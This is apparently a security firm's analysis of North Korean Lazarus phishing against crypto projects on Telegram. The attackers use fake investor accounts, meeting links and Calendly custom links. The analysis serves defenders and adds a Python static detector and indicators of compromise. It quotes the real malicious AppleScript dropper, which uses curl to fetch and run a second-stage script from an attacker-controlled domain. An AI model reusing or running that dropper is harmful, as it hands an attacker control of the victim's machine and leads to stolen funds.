Analysis of Targeted Fraud Attacks by North Korean Hackers on Telegram


Background

As early as 2022, the SlowMist security team discovered through the SlowMist BTI intelligence network that the North Korean hacker group Lazarus had launched a large-scale Telegram phishing operation targeting the cryptocurrency industry. Recently, North Korean hackers have gone further and begun impersonating well-known investment institutions in order to run fraudulent phishing against project parties. Given the breadth of the impact, SlowMist presents an analysis here.

Tactics

1. Choose well-known investment institutions as impersonation targets, and then create fake Telegram accounts:

2. Look for well-known DeFi project parties as targets. Pretending to want to invest in them, use fake accounts to implement scams:

The North Korean hackers will initiate a chat with the target to establish contact. If the project party sees the message and lacks security awareness, the following scene will occur:

After gaining the project party’s trust, the North Korean hackers will proceed to arrange a meeting. There are two attack methods here:

1. Invite the project party to join a meeting on a site like ***.group-meeting.team, pretending to ask whether they have time for a meeting or further discussion, and actively provide a malicious meeting link. When the project party clicks the link, they are shown a regional access restriction message. At this point, the North Korean hackers prompt the project party to download and run a malicious script they provide for “modifying location.” Once the project party does so, their computer is under the North Korean hackers’ control, leading to the theft of funds. The following is the content of the malicious script IP_Request.scpt:

set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"
set sc to do shell script "curl -L -k \"" & fix_url & "\""
run script sc

Code Explanation: the script stores the attacker-controlled URL in fix_url, uses curl to fetch whatever the server returns (-L follows redirects, -k disables TLS certificate verification), and hands the downloaded text straight to run script, so the second-stage payload is compiled and executed in memory without the victim ever seeing a file.

2. Utilize the “Add Custom Link” feature on the Calendly meeting scheduling system’s event page to insert a malicious link and launch a phishing attack. Since Calendly is part of the everyday workflow of most project parties, these malicious links raise little suspicion, and project parties readily click them, downloading and executing the malicious code. At this point, the North Korean hackers can also obtain project-related information or permissions.
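As an added example (not part of the SlowMist write-up), the following Python triage script flags the download-and-execute pattern of IP_Request.scpt in AppleScript source: a variable assigned from do shell script running curl or wget that is later handed to run script or do shell script. Both sample inputs are constructed; the only real value is the URL quoted from the article, and the detection is purely static, so nothing is fetched.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed sample: text form of the IP_Request.scpt dropper quoted above
# (a compiled .scpt can be turned back into text with macOS's osadecompile).
SAMPLE_SCRIPT = '''set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"
set sc to do shell script "curl -L -k \\"" & fix_url & "\\""
run script sc
'''

# Constructed benign sample: fetches remote text but only displays it.
BENIGN_SCRIPT = '''set ver to do shell script "curl -s https://updates.example.invalid/version.txt"
display dialog ver
'''

URL_RE = re.compile(r'https?://[^\s"\']+')
SET_SHELL_RE = re.compile(r'\s*set\s+(\w+)\s+to\s+do shell script\s+(.*)')
EXEC_VAR_RE = re.compile(r'(?:run script|do shell script)\s+\(?(\w+)\)?')

@dataclass
class Finding:
    downloads: bool = False          # do shell script that runs curl/wget
    insecure_tls: bool = False       # curl -k / --insecure
    executes_fetched: bool = False   # fetched text passed to run script / do shell script
    domains: list = field(default_factory=list)   # hostnames seen in the source

    @property
    def verdict(self) -> str:
        if self.downloads and self.executes_fetched:
            return "download-and-execute"
        return "remote-download" if self.downloads else "no-network-staging"

def analyze(source: str) -> Finding:
    """Static triage of AppleScript source for the staging pattern in the article."""
    f = Finding()
    f.domains = sorted({urlparse(u).hostname for u in URL_RE.findall(source)})
    fetched_vars = set()    # variables that hold the output of a downloader
    for line in source.splitlines():
        m = SET_SHELL_RE.match(line)
        if m and re.search(r'\b(curl|wget)\b', m.group(2)):
            f.downloads = True
            fetched_vars.add(m.group(1))
            if re.search(r'\s-k\b|--insecure\b', m.group(2)):
                f.insecure_tls = True
            continue
        e = EXEC_VAR_RE.search(line)
        if e and e.group(1) in fetched_vars:   # data flow: download -> execute
            f.executes_fetched = True
    return f
```

Run analyze() over the text of any .applescript or decompiled .scpt found on a host; a "download-and-execute" verdict together with insecure_tls is the signature described above and the collected domains can be checked against the IOC list.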

The SlowMist security team also issued a reminder about these attack methods on November 30, 2023:

Basic IOC:

IP: 104.168.137.21

Domains:

Malicious attack example:

Summary

Given that such scams continue to occur, it is recommended that Web3 users ensure the authenticity of the other party when adding friends through dual-channel verification, enable two-factor authentication (2FA) on Telegram, and always pay attention to transaction security to avoid financial losses.

If you accidentally run a related Trojan, move the relevant funds to a safe wallet, disconnect from the network, and run antivirus software as soon as possible. Also remember to change the passwords of the relevant accounts used on the affected computer (including those stored in the browser).

We will continue to update Blocking; if you have any questions or suggestions, please contact us!
